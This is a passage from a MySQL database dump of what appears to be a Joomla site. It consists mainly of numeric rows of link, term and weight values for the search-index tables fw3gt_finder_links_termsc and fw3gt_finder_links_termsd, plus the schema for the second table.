1613297,1.16669),(4732,1613298,0.77),(4732,1613299,1.00331),(4732,1613300,0.93331),(4732,1613301,1.09669),(4732,1613302,0.91),(4761,1613302,0.91),(4732,1613303,1.02669),(4761,1613303,1.02669),(4732,1613304,0.86331),(4762,1613304,0.86331),(4732,1613305,0.98),(4732,1613306,0.91),(4732,1613307,1.07331),(4732,1613308,0.68),(4732,1613347,0.88669),(4732,1613348,1.05),(4732,1613349,0.88669),(4732,1613350,1.02669),(4732,1613396,0.56),(4761,1613396,0.56),(4732,1613397,1.02669),(4732,1613398,1.23669),(4732,1613399,0.23331),(4732,1613400,1.05),(4732,1613401,1.09669),(4734,1615837,0.68),(4734,1615981,0.88669),(4734,1615982,0.93331),(4734,1615983,0.77),(4734,1615984,0.84),(4734,1615985,0.79331),(4777,1615985,0.79331),(4734,1615986,0.86331),(4734,1615987,2.32339),(4734,1615988,2.55),(4734,1615989,1.05),(4734,1615990,1.12),(4734,1615991,0.79331),(4734,1615992,0.98),(4734,1615993,0.79331),(4734,1615994,1.21331),(4734,1615995,0.81669),(4734,1615996,0.98),(4734,1615997,0.14),(4849,1615997,0.14),(4734,1615998,1.00331),(4734,1615999,1.19),(4734,1616000,0.81669),(4734,1616001,1.02669),(4734,1616002,0.18669),(4849,1616002,0.18669),(4938,1616002,0.18669),(4940,1616002,0.37338),(4734,1616003,1.02669),(4734,1616004,1.26),(4734,1616005,0.7),(4734,1616006,1.14331),(4734,1616007,1.26),(4734,1616008,0.14),(4803,1616008,0.14),(4849,1616008,0.14),(4924,1616008,0.34),(4734,1616009,0.81669),(4924,1616009,1.98339),(4734,1616010,0.88669),(4734,1616011,0.51331),(4734,1616012,1.14331),(4734,1616013,1.37669),(4734,1616014,0.46669),(4734,1616015,1.07331),(4734,1616016,1.21331),(4734,1616017,0.28),(4734,1616018,0.91),(4734,1616019,1.05),(4734,1616020,0.42),(4734,1616021,1.12),(4734,1616022,1.4),(4734,1616023,0.14),(4734,1616024,0.81669),(4734,1616025,0.91),(4735,1617884,2.4666),(4735,1617885,2.8),(4735,1617886,1.85),(4735,1617887,2.6666),(4735,1617888,3.1334),(4735,1617889,2.21),(4735,1617890,2.55),(4735,1617891,3.1334),(4735,1617892,0.68),(4735,1617893,2.3334),(4735,1617894,2.6666),(4735,1617895,1.7),(4735,1617896,2.55),(4735,1617897,3.00339),(4736,1618011,2.7334),(4736,1618012,2.32339),(4736,1618013,0.68),(4762,1620165,0.14),(4917,1620165,0.14),(4761,1620165,0.28),(4761,1620171,0.7),(4762,1620171,0.7),(4761,1620172,0.98),(4762,1620172,0.98),(4761,1620173,1.14331),(4762,1620173,1.14331),(4761,1620292,0.14),(4762,1620292,0.28),(4741,1621206,0.7),(4749,1621206,0.7),(4753,1621206,0.7),(4839,1621206,0.7),(4847,1621206,0.7),(4851,1621206,0.7),(4852,1621206,0.7),(4857,1621206,0.7),(4955,1621206,0.7),(4741,1621207,1.19),(4749,1621207,1.19),(4753,1621207,1.19),(4851,1621207,1.19),(4852,1621207,1.19),(4857,1621207,1.19),(4741,1621208,1.30669),(4741,1621209,0.86331),(4741,1621210,1.05),(4741,1621211,0.68),(4749,1623502,1.05),(4851,1623502,1.05),(4749,1623503,1.30669),(4851,1623503,1.30669),(4749,1623504,0.86331),(4852,1623504,0.86331),(4753,1623504,2.09661),(4749,1623505,0.95669),(4749,1623506,0.68),(4753,1623626,2.4666),(4753,1623627,0.68),(4755,1623720,0.6),(4759,1623814,0.68),(4761,1625892,0.95669),(4761,1625893,1.05),(4761,1625894,6.69683),(4761,1625895,7.84),(4761,1625896,0.7),(4761,1625897,0.98),(4761,1625898,1.14331),(4761,1625899,0.7),(4761,1625900,0.98),(4761,1625901,1.14331),(4761,1625902,0.7),(4761,1625903,0.98),(4761,1625904,1.14331),(4761,1625905,0.7),(4761,1625906,0.98),(4761,1625907,1.14331),(4761,1625908,0.7),(4761,1625909,0.98),(4761,1625910,1.14331),(4761,1625911,0.7),(4761,1625912,0.98),(4761,1625913,1.14331),(4761,1625914,0.7),(4761,1625915,0.98),(4761,1625916,1.14331),(4761,1625917,0.7),(4761,1625918,0.98),(4761,1625919,1.14331),(4761,1625920,0.7),(4761,1625921,0.98),(4761,1625922,1.14331),(4761,1625923,0.7),(4761,1625924,0.98),(4761,1625925,1.14331),(4761,1625926,0.98),(4761,1625927,1.00331),(4761,1625928,0.95669),(4761,1625929,2.31),(4761,1625930,1.02669),(4761,1625931,0.95669),(4761,1625932,0.93331),(4761,1625933,0.91),(4761,1625934,1.05),(4761,1625935,0.93331),(4761,1625936,1.09669),(4761,1625937,0.95669),(4761,1625938,1.14331),(4761,1625939,0.95669),(4761,1625940,1.14331),(4761,1625941,0.98),(4761,1625942,1.14331),(4761,1625943,0.95669),(4761,1625944,1.09669),(4761,1625945,0.91),(4761,1625946,1.14331),(4761,1625947,0.98),(4761,1625948,1.09669),(4761,1625949,1.02669),(4761,1625950,1.14331),(4761,1625951,0.88669),(4761,1625952,1.12),(4761,1625953,0.91),(4761,1625954,1.07331),(4761,1625955,0.91),(4761,1625956,0.95669),(4761,1625957,0.21),(4761,1625958,0.81669),(4761,1625959,1.05),(4761,1625960,0.21),(4761,1625961,0.91),(4761,1625962,0.95669),(4761,1625963,0.35),(4761,1625964,0.93331),(4761,1625965,0.98),(4761,1625966,0.7),(4761,1625967,0.98),(4761,1625968,1.14331),(4761,1625969,0.7),(4761,1625970,1.05),(4761,1625971,1.21331),(4761,1625972,0.91),(4761,1625973,0.98),(4761,1625974,0.21),(4761,1625975,0.91),(4761,1625976,0.95669),(4761,1625977,0.28),(4761,1625978,0.84),(4761,1625979,1.07331),(4761,1625980,0.35),(4761,1625981,0.93331),(4761,1625982,0.98),(4761,1625983,0.21),(4761,1625984,0.91),(4761,1625985,0.95669),(4761,1625986,0.28),(4761,1625987,0.84),(4761,1625988,1.07331),(4761,1625989,0.35),(4761,1625990,0.86331),(4761,1625991,1.82),(4761,1625992,0.95669),(4761,1625993,0.95669),(4761,1625994,0.7),(4761,1625995,0.98),(4761,1625996,1.14331),(4761,1625997,0.7),(4761,1625998,0.98),(4761,1625999,1.14331),(4761,1626000,0.7),(4761,1626001,2.1),(4761,1626002,2.42662),(4761,1626003,0.35),(4761,1626004,0.93331),(4761,1626005,0.98),(4761,1626006,0.21),(4761,1626007,0.81669),(4761,1626008,1.05),(4761,1626009,0.88669),(4761,1626010,1.12),(4761,1626011,0.98),(4761,1626012,1.14331),(4761,1626013,0.7),(4761,1626014,1.86662),(4761,1626015,0.98),(4761,1626016,0.98),(4761,1626017,0.7),(4761,1626018,0.98),(4761,1626019,1.14331),(4761,1626020,0.7),(4761,1626021,0.98),(4761,1626022,1.14331),(4761,1626023,0.21),(4761,1626024,0.91),(4761,1626025,0.95669),(4761,1626026,0.21),(4761,1626027,0.91),(4761,1626028,0.95669),(4761,1626029,0.7),(4761,1626030,0.98),(4761,1626031,1.14331),(4761,1626032,0.7),(4761,1626033,0.98),(4761,1626034,1.14331),(4761,1626035,0.7),(4761,1626036,0.98),(4761,1626037,1.14331),(4761,1626038,0.42),(4761,1626039,0.88669),(4761,1626040,0.93331),(4761,1626041,0.21),(4761,1626042,0.81669),(4761,1626043,1.05),(4761,1626044,0.7),(4761,1626045,0.98),(4761,1626046,1.14331),(4761,1626047,0.7),(4761,1626048,0.98),(4761,1626049,1.14331),(4761,1626050,0.21),(4761,1626051,0.81669),(4761,1626052,1.05),(4761,1626053,1.54),(4761,1626054,1.02669),(4761,1626055,1.00331),(4761,1626056,1.54),(4761,1626057,0.91),(4761,1626058,0.95669),(4761,1626059,0.88669),(4761,1626060,1.05),(4761,1626061,0.88669),(4761,1626062,1.05),(4761,1626063,0.93331),(4761,1626064,1.14331),(4761,1626065,0.98),(4761,1626066,1.14331),(4761,1626067,0.98),(4761,1626068,1.09669),(4761,1626069,0.95669),(4761,1626070,1.12),(4761,1626071,0.93331),(4761,1626072,1.07331),(4761,1626073,0.95669),(4761,1626074,1.12),(4761,1626075,0.88669),(4761,1626076,1.09669),(4761,1626077,1.72662),(4761,1626078,1.96),(4761,1626079,0.35),(4761,1626080,0.93331),(4761,1626081,1.16669),(4761,1626082,0.35),(4761,1626083,0.93331),(4761,1626084,1.16669),(4761,1626085,0.7),(4761,1626086,0.98),(4761,1626087,1.14331),(4761,1626088,0.7),(4761,1626089,0.98),(4761,1626090,1.14331),(4761,1626091,0.21),(4761,1626092,0.91),(4761,1626093,0.95669),(4761,1626094,0.21),(4761,1626095,0.91),(4761,1626096,0.95669),(4761,1626097,0.7),(4761,1626098,0.98),(4761,1626099,1.14331),(4761,1626100,0.7),(4761,1626101,0.98),(4761,1626102,1.14331),(4761,1626103,0.21),(4761,1626104,0.91),(4761,1626105,0.95669),(4761,1626106,0.21),(4761,1626107,0.91),(4761,1626108,0.95669),(4761,1626109,0.35),(4761,1626110,0.86331),(4761,1626111,1.09669),(4761,1626112,0.7),(4761,1626113,0.98),(4761,1626114,1.14331),(4761,1626115,0.21),(4761,1626116,0.91),(4761,1626117,0.95669),(4761,1626118,0.21),(4761,1626119,0.91),(4761,1626120,0.95669),(4761,1626121,0.68),(4761,1626122,0.28),(4761,1626123,1.72662),(4761,1626124,1.96),(4761,1626125,0.7),(4761,1626126,0.98),(4761,1626127,1.14331),(4761,1626128,0.7),(4761,1626129,0.98),(4761,1626130,1.14331),(4761,1626131,0.7),(4761,1626132,0.98),(4761,1626133,1.14331),(4761,1626134,0.7),(4761,1626135,0.98),(4761,1626136,1.14331),(4761,1626137,0.7),(4761,1626138,0.98),(4761,1626139,1.14331),(4761,1626140,0.7),(4761,1626141,0.98),(4761,1626142,1.14331),(4761,1626143,0.7),(4761,1626144,0.98),(4761,1626145,1.14331),(4761,1626273,0.56),(4761,1626274,1.82),(4761,1626275,0.95669),(4761,1626276,0.95669),(4761,1626277,0.35),(4761,1626278,0.86331),(4761,1626279,1.09669),(4761,1626280,0.21),(4761,1626281,0.81669),(4761,1626282,1.05),(4761,1626342,0.51331),(4761,1626343,1.21331),(4761,1626344,1.4),(4761,1626345,1.23669),(4761,1626346,1.4),(4761,1626347,0.42),(4761,1626348,1.16669),(4761,1626349,1.35331),(4761,1626350,0.28),(4761,1626351,1.09669),(4761,1626352,1.35331),(4761,1626353,0.98),(4761,1626354,1.12),(4761,1626355,0.46669),(4761,1626356,1.19),(4761,1626357,1.37669),(4761,1626358,0.18662),(4761,1626359,1.14331),(4761,1626360,1.28331),(4761,1626361,1.07331),(4761,1626362,1.23669),(4762,1627939,0.7),(4762,1627940,0.98),(4762,1627941,1.14331),(4762,1627942,0.7),(4762,1627943,0.98),(4762,1627944,1.14331),(4762,1627945,0.7),(4762,1627946,0.98),(4762,1627947,1.14331),(4762,1627948,0.7),(4762,1627949,0.98),(4762,1627950,1.14331),(4762,1627951,0.7),(4762,1627952,0.98),(4762,1627953,1.14331),(4762,1627954,0.7),(4762,1627955,0.98),(4762,1627956,1.14331),(4762,1627957,0.7),(4762,1627958,0.98),(4762,1627959,1.14331),(4762,1627960,0.7),(4762,1627961,0.98),(4762,1627962,1.14331),(4762,1627963,1.68),(4762,1627964,0.93331),(4762,1627965,1.07331),(4762,1627966,0.95669),(4762,1627967,1.07331),(4762,1627968,0.98),(4762,1627969,1.21331),(4762,1627970,0.93331),(4762,1627971,1.09669),(4762,1627972,0.7),(4762,1627973,0.98),(4762,1627974,1.14331),(4762,1627975,0.7),(4762,1627976,0.98),(4762,1627977,1.14331),(4762,1627978,0.7),(4762,1627979,0.98),(4762,1627980,1.14331),(4762,1627981,0.7),(4762,1627982,0.98),(4762,1627983,1.14331),(4762,1627984,0.88669),(4762,1627985,1.12),(4762,1627986,0.7),(4762,1627987,0.98),(4762,1627988,1.14331),(4762,1627989,1.68),(4762,1627990,1.07331),(4762,1627991,1.16669),(4762,1627992,1.02669),(4762,1627993,1.91338),(4762,1627994,1.14331),(4762,1627995,1.12),(4762,1627996,0.93331),(4762,1627997,1.16669),(4762,1627998,0.7),(4762,1627999,0.98),(4762,1628000,1.14331),(4762,1628001,0.7),(4762,1628002,0.98),(4762,1628003,1.14331),(4762,1628004,0.7),(4762,1628005,0.98),(4762,1628006,1.14331),(4762,1628007,0.7),(4762,1628008,0.98),(4762,1628009,1.14331),(4762,1628010,0.7),(4762,1628011,0.98),(4762,1628012,1.14331),(4762,1628013,0.68),(4762,1628014,0.7),(4762,1628015,0.98),(4762,1628016,1.14331),(4762,1628057,0.93331),(4762,1628058,1.05),(4762,1628059,1.00331),(4762,1628060,1.21331),(4762,1628095,1.09669),(4762,1628096,1.33),(4762,1628097,0.51331),(4762,1628098,1.12),(4762,1628099,1.4),(4762,1628100,0.98),(4762,1628101,1.12),(4762,1628102,0.95669),(4762,1628103,1.07331),(4762,1628104,0.32669),(4762,1628105,1.07331),(4762,1628106,1.30669),(4764,1629025,2.8),(4764,1629026,3.1334),(4764,1629027,2.26661),(4764,1629028,2.55),(4764,1629029,0.68),(4766,1629119,0.51),(4767,1629126,2.6666),(4767,1629127,3),(4767,1629128,2.21),(4767,1629129,2.49339),(4767,1629130,0.68),(4940,1629203,0.84),(4770,1629203,1.48),(4780,1629203,1.48),(4799,1629203,1.48),(4806,1629203,1.48),(4837,1629203,2.28),(4850,1629203,2.28),(4918,1629203,2.28),(4928,1629203,2.28),(4951,1629203,2.28),(4814,1629203,2.96),(4938,1629203,3.4),(4770,1629204,2.6666),(4770,1629205,2.26661),(4770,1629206,0.68),(4771,1629234,0.51),(4773,1629272,0.68),(4776,1629333,0.68),(4777,1629348,0.88669),(4777,1629349,0.95669),(4777,1629350,0.68),(4777,1629401,0.95669),(4777,1629402,0.86331),(4777,1629403,1.12),(4778,1629859,0.68),(4780,1629937,2.6),(4799,1629937,2.6),(4806,1629937,2.6),(4814,1629937,5.2),(4837,1629937,5.2),(4850,1629937,5.2),(4928,1629937,5.2),(4938,1629937,5.2),(4940,1629938,0.91),(4780,1629938,2.21),(4799,1629938,2.21),(4806,1629938,2.21),(4837,1629938,2.21),(4850,1629938,2.21),(4928,1629938,2.21),(4814,1629938,4.42),(4938,1629938,5.85),(4780,1629939,0.68),(4798,1643103,1.63338),(4798,1643104,0.81669),(4798,1643105,1.54),(4798,1643106,0.81669),(4798,1643107,0.86331),(4798,1643108,0.79331),(4798,1643109,0.86331),(4798,1643110,1.63338),(4798,1643111,1.72662),(4798,1643112,0.77),(4798,1643113,1.07331),(4798,1643114,2.52),(4798,1643115,0.91),(4798,1643116,1.82),(4798,1643117,0.88669),(4798,1643118,0.93331),(4798,1643119,2.87007),(4798,1643120,2.4),(4798,1643121,1.68),(4798,1643122,1.05),(4798,1643123,1.26),(4798,1643124,0.81669),(4798,1643125,0.98),(4798,1643126,0.84),(4798,1643127,0.88669),(4798,1643128,0.91),(4798,1643129,1.00331),(4798,1643130,1.77338),(4798,1643131,1.86662),(4798,1643132,0.68),(4798,1643163,0.60669),(4798,1643164,1.21331),(4798,1643165,1.4),(4798,1643166,0.7),(4798,1643167,1.4),(4798,1643168,1.4),(4798,1643169,0.56),(4798,1643170,1.23669),(4798,1643171,1.4),(4798,1643172,0.51331),(4798,1643173,1.19),(4798,1643174,1.4),(4803,1644906,0.68),(4803,1644954,0.98),(4803,1644955,1.16669),(4804,1645161,0.68),(4806,1645255,0.68),(4808,1645349,0.68),(4809,1645380,0.68),(4813,1645504,2.4666),(4813,1645505,2.09661),(4813,1645506,2.26661),(4813,1645507,2.26661),(4813,1645508,2.38),(4813,1645509,0.68),(4814,1645567,3.4),(4814,1645568,3.1334),(4814,1645569,2.89),(4814,1645570,2.60661),(4814,1645571,2.7334),(4814,1645572,3.0666),(4814,1645573,2.26661),(4814,1645574,2.55),(4814,1645575,0.68),(4837,1646492,2.4),(4837,1646493,3.1334),(4837,1646494,5.3332),(4837,1646495,6),(4837,1646496,1.48),(4837,1646497,3),(4837,1646498,3.7334),(4837,1646501,2.5334),(4849,1646501,2.5334),(4850,1646501,2.5334),(4909,1646501,2.5334),(4917,1646501,2.5334),(4918,1646501,2.5334),(4924,1646501,2.5334),(4927,1646501,2.5334),(4928,1646501,2.5334),(4929,1646501,2.5334),(4934,1646501,2.5334),(4935,1646501,2.5334),(4938,1646501,2.5334),(4940,1646501,2.5334),(4945,1646501,2.5334),(4951,1646501,2.5334),(4953,1646501,2.5334),(4956,1646501,2.5334),(4837,1646502,2.6666),(4849,1646502,2.6666),(4850,1646502,2.6666),(4909,1646502,2.6666),(4917,1646502,2.6666),(4918,1646502,2.6666),(4924,1646502,2.6666),(4927,1646502,2.6666),(4928,1646502,2.6666),(4929,1646502,2.6666),(4934,1646502,2.6666),(4935,1646502,2.6666),(4938,1646502,2.6666),(4940,1646502,2.6666),(4945,1646502,2.6666),(4951,1646502,2.6666),(4953,1646502,2.6666),(4956,1646502,2.6666),(4839,1646570,1.00331),(4839,1646571,1.48),(4839,1646572,2.6666),(4839,1646573,3),(4839,1646582,0.91),(4839,1646583,0.98),(4847,1646850,1.48),(4847,1646851,2.6),(4847,1646852,3.2),(4849,1646912,1.68),(4849,1646913,1.82),(4849,1646914,0.35),(4849,1646915,0.91),(4849,1646916,0.98),(4849,1646917,2.4),(4849,1646918,2.8666),(4849,1646919,0.28),(4849,1646920,0.91),(4849,1646921,1.09669),(4849,1646922,1.48),(4849,1646923,2.7334),(4849,1646924,3.4),(4849,1646925,0.21),(4849,1646926,0.84),(4849,1646927,1.00331),(4849,1646983,1.12),(4849,1646984,1.00331),(4849,1646985,1.14331),(4849,1646986,0.86331),(4849,1646987,1.02669),(4849,1646988,0.86331),(4849,1646989,0.91),(4849,1646990,0.60669),(4849,1646991,1.14331),(4849,1646992,1.35331),(4850,1647935,2.4),(4850,1647936,3.1334),(4850,1647937,1.48),(4850,1647938,3),(4850,1647939,3.7334),(4851,1647966,0.86331),(4929,1647966,2.09661),(4851,1647967,0.95669),(4851,1647968,1.48),(4851,1647969,2.7334),(4851,1647970,3.3334),(4852,1648029,0.86331),(4852,1648030,0.93331),(4852,1648031,1.09669),(4852,1648032,1.48),(4852,1648033,3),(4852,1648034,3.6),(4857,1648296,1.48),(4857,1648297,2.8666),(4857,1648298,3.3334),(4909,1672152,0.95669),(4909,1672153,1.00331),(4909,1672154,0.14),(4909,1672155,0.86331),(4909,1672156,0.91),(4909,1672157,0.77),(4909,1672158,1.00331),(4909,1672159,0.77),(4909,1672160,1.02669),(4909,1672161,0.91),(4909,1672162,1.05),(4909,1672163,0.95669),(4909,1672164,1.00331),(4909,1672165,2.4),(4909,1672166,3),(4909,1672167,0.86331),(4909,1672168,0.91),(4909,1672169,1.63338),(4909,1672170,1.02669),(4909,1672171,0.91),(4909,1672172,0.14),(4909,1672173,0.81669),(4909,1672174,0.93331),(4909,1672175,1.48),(4909,1672176,2.8666),(4909,1672177,3.4),(4909,1672227,0.28),(4909,1672228,1.14331),(4909,1672229,1.30669),(4909,1672230,1.24),(4909,1672231,1.12),(4909,1672232,1.16669),(4909,1672233,2.21),(4909,1672234,2.72),(4909,1672235,1.00331),(4909,1672236,1.14331),(4917,1678832,0.21),(4917,1678833,0.95669),(4917,1678834,1.12),(4917,1678835,0.86331),(4917,1678836,0.95669),(4938,1678837,0.86331),(4917,1678837,1.72662),(4917,1678838,0.98),(4938,1678838,0.98),(4917,1678839,1.16669),(4917,1678840,0.84),(4917,1678841,1.02669),(4917,1678842,1.14331),(4917,1678843,0.84),(4917,1678844,1.02669),(4917,1678845,2.4),(4917,1678846,2.6),(4917,1678847,0.28),(4938,1678847,0.56),(4940,1678847,0.84),(4917,1678848,0.91),(4938,1678848,1.82),(4940,1678848,1.82),(4917,1678849,1.12),(4917,1678850,1.48),(4917,1678851,2.4666),(4917,1678852,2.9334),(4917,1678855,0.81669),(4917,1678856,1.00331),(4917,1678894,0.28),(4917,1678895,0.91),(4917,1678896,1.02669),(4917,1678897,0.28),(4917,1678898,0.91),(4917,1678899,0.98),(4917,1678900,0.37331),(4917,1678901,1.09669),(4917,1678902,1.16669),(4918,1679855,5.2),(4918,1679856,5.8668),(4918,1679857,2.15339),(4918,1679858,2.43661),(4918,1679859,2.4),(4918,1679860,2.6),(4918,1679861,5.2),(4918,1679862,5.8668),(4918,1679863,2.21),(4918,1679864,2.49339),(4918,1679865,1.48),(4918,1679866,2.4666),(4918,1679867,2.9334),(4924,1680521,2.4),(4924,1680522,2.8666),(4924,1680523,1.48),(4924,1680524,2.7334),(4924,1680525,3.2666),(4924,1680559,0.56661),(4924,1680560,2.55),(4924,1680561,2.94661),(4924,1680562,0.56661),(4924,1680563,2.55),(4924,1680564,2.89),(4924,1680565,2.32339),(4927,1682694,0.95669),(4927,1682695,1.02669),(4927,1682696,0.98),(4927,1682697,1.07331),(4927,1682698,2.4),(4927,1682699,2.9334),(4927,1682700,0.91),(4927,1682701,1.09669),(4927,1682702,1.48),(4927,1682703,2.8),(4927,1682704,3.7334),(4927,1682790,0.98),(4927,1682791,0.86331),(4927,1682792,0.98),(4927,1682793,0.93331),(4927,1682794,1.09669),(4927,1682795,0.56),(4927,1682796,1.12),(4927,1682797,1.19),(4928,1683717,2.4),(4928,1683718,3.1334),(4928,1683719,1.48),(4928,1683720,3),(4928,1683721,3.7334),(4929,1683748,5.3332),(4929,1683749,5.7332),(4940,1683750,0.88669),(4938,1683750,1.77338),(4929,1683750,2.15339),(4929,1683751,2.32339),(4929,1683752,2.4),(4929,1683753,2.9334),(4929,1683754,4.9332),(4929,1683755,1.48),(4929,1683756,2.8),(4929,1683757,3.8666),(4930,1683779,1.48),(4930,1683780,2.8666),(4930,1683781,3.2666),(4931,1683810,1.48),(4931,1683811,2.8666),(4931,1683812,3.6),(4934,1683951,2.4),(4934,1683952,2.5334),(4934,1683953,1.48),(4934,1683954,2.4),(4934,1683955,2.7334),(4935,1684014,2.28),(4935,1684015,5.3332),(4935,1684016,2.26661),(4935,1684017,2.4),(4935,1684018,2.8666),(4935,1684019,1.48),(4935,1684020,2.7334),(4935,1684021,3.0666),(4938,1686091,0.79331),(4938,1686092,0.95669),(4940,1686093,1.00331),(4938,1686093,2.00662),(4938,1686094,0.98),(4938,1686095,1.21331),(4938,1686096,0.91),(4938,1686097,1.4),(4938,1686098,2.4),(4938,1686099,2.6),(4938,1686100,0.91),(4938,1686101,1.12),(4940,1686102,0.98),(4938,1686102,1.96),(4938,1686103,6.4),(4938,1686104,0.95669),(4938,1686105,1.02669),(4938,1686106,2.72),(4938,1686107,1.23669),(4938,1686108,1.02669),(4938,1686109,0.95669),(4938,1686110,1.07331),(4938,1686111,1.48),(4938,1686112,2.4666),(4938,1686113,3.0666),(4938,1686144,0.84),(4938,1686145,0.91),(4938,1686146,0.91),(4940,1686146,0.91),(4938,1686147,0.98),(4940,1686147,0.98),(4940,1688137,2.4),(4940,1688138,2.8),(4940,1688139,1.05),(4940,1688140,1.12),(4940,1688141,0.95669),(4940,1688142,1.02669),(4940,1688143,1.07331),(4940,1688144,0.98),(4940,1688145,0.98),(4940,1688146,0.91),(4940,1688147,1.02669),(4940,1688148,1.48),(4940,1688149,2.6666),(4940,1688150,3.1334),(4940,1688241,1.02669),(4940,1688242,1.00331),(4940,1688243,1.26),(4940,1688244,0.93331),(4940,1688245,1.30669),(4945,1689236,2.4),(4945,1689237,2.8666),(4945,1689238,1.48),(4945,1689239,2.7334),(4945,1689240,3.6),(4946,1689267,1.11),(4946,1689268,2.6),(4946,1689269,3.2),(4946,1689275,0.56661),(4949,1689275,0.56661),(4946,1689276,2.49339),(4947,1689282,1.48),(4947,1689283,2.8),(4947,1689284,3.5334),(4947,1689296,0.56661),(4948,1689313,1.48),(4948,1689314,2.6),(4948,1689315,2.9334),(4949,1689344,1.48),(4949,1689345,2.8666),(4949,1689346,3.2666),(4951,1689374,2.4),(4951,1689375,3.1334),(4951,1689376,5.0668),(4951,1689377,2.15339),(4951,1689378,1.48),(4951,1689379,3),(4951,1689380,3.7334),(4953,1689404,2.4),(4953,1689405,3),(4953,1689406,1.48),(4953,1689407,2.8666),(4953,1689408,3.2),(4954,1689435,1.48),(4954,1689436,2.6),(4954,1689437,2.8),(4955,1689469,1.48),(4955,1689470,3.1334),(4956,1689497,2.4),(4956,1689498,3.0666),(4956,1689499,1.48),(4956,1689500,2.9334),(4956,1689501,3.3334),(4957,1689512,1.48),(4957,1689513,2.4),(4957,1689514,2.7334);
/*!40000 ALTER TABLE `fw3gt_finder_links_termsc` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_termsd`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_termsd`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_termsd` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_termsd`
--

LOCK TABLES `fw3gt_finder_links_termsd` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_termsd` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_termsd` VALUES (4723,1523599,0.4),(4764,1523599,0.4),(4837,1523599,0.8),(4850,1523599,0.8),(4928,1523599,0.8),(4951,1523599,0.8),(4723,1523600,2.4),(4764,1523600,2.4),(4723,1523633,0.56),(4764,1523633,0.56),(4851,1523633,0.56),(4852,1523633,0.56),(4678,1523633,1.36),(4850,1523633,1.92),(4928,1523633,1.92),(4951,1523633,1.92),(4723,1523634,1.07331),(4764,1523634,1.07331),(4850,1523634,1.07331),(4928,1523634,1.07331),(4951,1523634,1.07331),(4539,1523827,0.56661),(4543,1523854,0),(4574,1523854,0),(4580,1523854,0),(4581,1523854,0),(4585,1523854,0),(4591,1523854,0),(4592,1523854,0),(4593,1523854,0),(4595,1523854,0),(4653,1523854,0),(4664,1523854,0),(4672,1523854,0),(4673,1523854,0),(4678,1523854,0),(4687,1523854,0),(4727,1523854,0),(4735,1523854,0),(4755,1523854,0),(4759,1523854,0),(4762,1523854,0),(4766,1523854,0),(4767,1523854,0),(4770,1523854,0),(4771,1523854,0),(4773,1523854,0),(4776,1523854,0),(4778,1523854,0),(4799,1523854,0),(4804,1523854,0),(4806,1523854,0),(4808,1523854,0),(4809,1523854,0),(4813,1523854,0),(4814,1523854,0),(4918,1523854,0),(4924,1523854,0),(4929,1523854,0),(4930,1523854,0),(4931,1523854,0),(4935,1523854,0),(4945,1523854,0),(4946,1523854,0),(4947,1523854,0),(4948,1523854,0),(4949,1523854,0),(4953,1523854,0),(4954,1523854,0),(4956,1523854,0),(4957,1523854,0),(4552,1523953,0.09331),(4594,1523953,0.09331),(4635,1523953,0.09331),(4693,1523953,0.09331),(4710,1523953,0.09331),(4761,1523953,0.09331),(4839,1523953,0.09331),(4604,1523953,0.18662),(4616,1523953,0.18662),(4653,1523953,0.22661),(4678,1523953,0.22661),(4780,1523953,0.22661),(4814,1523953,0.22661),(4954,1523953,0.22661),(4608,1523953,0.27993),(4798,1523953,0.27993),(4624,1523953,0.46655),(4938,1523953,0.46655),(4917,1523953,0.55986),(4940,1523953,0.55986),(4614,1523953,0.65317),(4625,1523953,0.65317),(4909,1523953,0.65317),(4777,1523953,0.73315),(4927,1523953,0.83979),(4849,1523953,0.87978),(4734,1523953,1.53295),(4721,1523953,1.77289),(4626,1523953,2.14613),(4552,1523954,0.93331),(4552,1523955,1.02669),(4552,1523956,0.37331),(4552,1523957,1.02669),(4552,1523958,1.37669),(4569,1524804,0.32669),(4571,1524804,0.32669),(4572,1524804,0.32669),(4661,1524804,0.32669),(4669,1524804,0.32669),(4741,1524804,0.32669),(4749,1524804,0.32669),(4753,1524804,0.32669),(4761,1524804,0.32669),(4839,1524804,0.32669),(4847,1524804,0.32669),(4851,1524804,0.32669),(4852,1524804,0.32669),(4857,1524804,0.32669),(4569,1524805,1.07331),(4571,1524805,1.07331),(4572,1524805,1.07331),(4661,1524805,1.07331),(4669,1524805,1.07331),(4741,1524805,1.07331),(4749,1524805,1.07331),(4753,1524805,1.07331),(4851,1524805,1.07331),(4852,1524805,1.07331),(4569,1524806,1.26),(4571,1524806,1.26),(4572,1524806,1.26),(4661,1524806,1.26),(4669,1524806,1.26),(4741,1524806,1.26),(4749,1524806,1.26),(4753,1524806,1.26),(4851,1524806,1.26),(4852,1524806,1.26),(4571,1524958,0.51331),(4571,1524959,1.09669),(4571,1524960,1.19),(4571,1524984,0.42),(4572,1524984,0.42),(4661,1524984,0.42),(4669,1524984,0.42),(4741,1524984,0.42),(4749,1524984,0.42),(4753,1524984,0.42),(4851,1524984,0.42),(4909,1524984,0.84),(4571,1524985,1.00331),(4571,1524986,1.19),(4572,1525022,1.05),(4661,1525022,1.05),(4572,1525023,1.16669),(4762,1525180,0.42),(4593,1527400,0.79339),(4593,1527401,2.43661),(4594,1527587,0.81669),(4624,1527587,1.63338),(4798,1527587,2.45007),(4594,1527588,0.98),(4594,1527589,0.23331),(4762,1527589,0.23331),(4761,1527589,0.46662),(4594,1527590,1.05),(4594,1527591,1.12),(4594,1527592,0.42),(4849,1527592,0.42),(4594,1527593,0.23331),(4594,1527594,1.02669),(4594,1527595,1.28331),(4604,1529201,0.79331),(4608,1529201,0.79331),(4917,1529201,0.79331),(4626,1529201,12.693),(4608,1529209,0.09331),(4616,1529209,0.09331),(4917,1529209,0.09331),(4604,1529209,0.18662),(4617,1529209,0.18662),(4624,1529209,0.18662),(4721,1529209,0.18662),(4798,1529